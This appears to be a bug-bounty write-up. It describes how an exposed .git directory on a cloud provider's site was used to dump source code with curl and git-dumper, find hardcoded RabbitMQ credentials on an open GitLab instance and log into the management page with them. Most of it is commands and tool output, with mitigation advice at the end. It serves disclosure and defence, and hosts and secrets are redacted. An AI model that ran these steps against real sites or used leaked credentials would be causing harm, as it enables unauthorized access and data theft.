BOOK THIS SPACE FOR AD
ARTICLE ADHello everyone,
In this post, I will show you how I “accidentally” discovered a vulnerability in one of the Indonesian cloud provider companies that could lead to information disclosure such as hardcoded credentials. There’s no sophisticated tool used since I just used a Chrome browser & extension called DotGit (An extension for checking if .git is exposed in visited websites).
Who is the target?
The target asked me to not disclose the company name so let’s call it Company X, it’s one of Indonesia’s cloud provider companies.
Reconnaissance
Actually, I don’t do any bug hunting at that time, but I try to look for a hosting solution to put/ host my PoC (Proof of Concept) script for my other reports in the cloud. While searching at this Company X & open their hosting solution at one of their subdomains https://subdomain.REDACTED.com/, suddenly my Chrome browser popped a notification about a .git directory exposed.
DotGit found an exposed .gitTo prove that the .git/ directory is accessible, it’s quite easy, we can use curl command:
$ curl https://REDACTED.com/.git/config[fetch]
recurseSubmodules = false
[http "https://gitlab.REDACTED.com"]
sslCAInfo = /home/gitlab-runner/builds/b8dc6653/0/dev/REDACTED.tmp/CI_SERVER_TLS_CA_FILE
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://gitlab-ci-token:REDACTED.REDACTED.com/dev/REDACTED.git
fetch = +refs/heads/*:refs/remotes/origin/*
Steps To Reproduce
To get the complete source code, we can use tools such as git-dumper.
[1] Install the git-dumper tool
[2] Run the following command to download the source code:
$ git-dumper https://REDACTED.com/.git output/[-] Testing https://REDACTED.com/.git/HEAD [200]
[-] Testing https://REDACTED.com/.git/ [301]
[-] Fetching common files
[-] Fetching https://REDACTED.com/.git/COMMIT_EDITMSG [404]
[-] https://REDACTED.com/.git/COMMIT_EDITMSG responded with status code 404
[-] Fetching https://REDACTED.com/.git/description [404]
[-] Fetching https://REDACTED.com/.gitignore [404]
[-] https://REDACTED.com/.gitignore responded with status code 404
[-] https://REDACTED.com/.git/description responded with status code 404
…
[-] Finding refs/
[-] Fetching https://REDACTED.com/.git/HEAD [200]
[-] Fetching https://REDACTED.com/.git/ORIG_HEAD [404]
[-] Fetching https://REDACTED.com/.git/FETCH_HEAD [200]
[-] https://REDACTED.com/.git/ORIG_HEAD responded with status code 404
[-] Fetching https://REDACTED.com/.git/logs/refs/heads/master [404]
[-] https://REDACTED.com/.git/logs/refs/heads/master responded with status code 404
[-] Fetching https://REDACTED.com/.git/logs/refs/stash [404]
[-] https://REDACTED.com/.git/logs/refs/stash responded with status code 404
[-] Fetching https://REDACTED.com/.git/logs/refs/remotes/origin/master [200]
[-] Fetching https://REDACTED.com/.git/logs/HEAD [200]
…
[-] Fetching https://REDACTED.com/.git/objects/5d/9e30841d5e824ea6f73eb28b9a545253de829e [404]
[-] Fetching https://REDACTED.com/.git/objects/33/07be62f91262e602f6efa4927c0937208bcd13 [404]
[-] https://REDACTED.com/.git/objects/33/07be62f91262e602f6efa4927c0937208bcd13 responded with status code 404
[-] https://REDACTED.com/.git/objects/5d/9e30841d5e824ea6f73eb28b9a545253de829e responded with status code 404
[-] Fetching https://REDACTED.com/.git/objects/95/7188f1abdb63b7bd22c402f0c709774a945d08 [404]
[-] https://REDACTED.com/.git/objects/95/7188f1abdb63b7bd22c402f0c709774a945d08 responded with status code 404
[-] Running git checkout .
[3] To ensure the downloaded .git folder is valid, we can run the git log command.
$ cd output/$ git log
commit 987fa867dc39aba5afe11801040967d31a6ece77 (HEAD, origin/master)
Author: REDACTED <REDACTED@REDACTED.co.id>
Date: Tue Mar 2 14:21:53 2021 +0700
style: add meta tag og and twitter
[4] Next, we can see the structure of the source code that has been downloaded using the tree command.
$ tree.
├── assets
│ ├── css
│ ├── img
│ │ ├── fitur
│ │ ├── harga
│ │ ├── header
│ │ │ └── icon-bg
│ │ ├── ikhtisar
│ │ └── kh-white-bg.png
│ ├── js
│ └── sass
│ ├── base
│ ├── components
│ ├── elements
│ ├── form
│ ├── grid
│ ├── helpers
│ ├── layout
│ └── utilities
└── index.html
Post Exploitation
Next, I tried to explore the Gitlab address listed on the .git/config file, namely https://gitlab.REDACTED.com/.
[1] To be able to see projects, we can access https://gitlab.REDACTED.com/explore/projects.
[2] I found a credential leak in the following file https://gitlab.REDACTED.com/user/ck-rmq/-/blob/5a0aba8d59ea2c3a2127f9d49e05026772a54d3c/config.php
<?phpdefine("RABBITMQ_HOST", "stage.REDACTED.com");
define("RABBITMQ_PORT", 5672);
define("RABBITMQ_USERNAME", "REDACTED");
define("RABBITMQ_PASSWORD", "REDACTED");
[3] To be able to prove that the credentials are valid, I tried accessing the RabbitMQ web management page http://stage.REDACTED.com:15672/ & after entering the credentials listed above I successfully entered the system.
I decided to log out and not explore further & immediately reported this security issue to Company X.
Impact
If a company’s source code is leaked, it can make the company more vulnerable to cyber-attacks and data breaches. Cybercriminals can use this information to steal important data or damage company systems.
Mitigation
1. Don’t include (exclude) the .git/ repository file when deploying to the production server. If this is a business requirement, implement an access control mechanism to limit public access to .git/ repository files.
2. Make sure that no credentials have been pushed to the Git repository & revoke all credentials that have been previously exposed.
Company X decide to restrict access to .git/ directory by returning 403 Forbidden instead.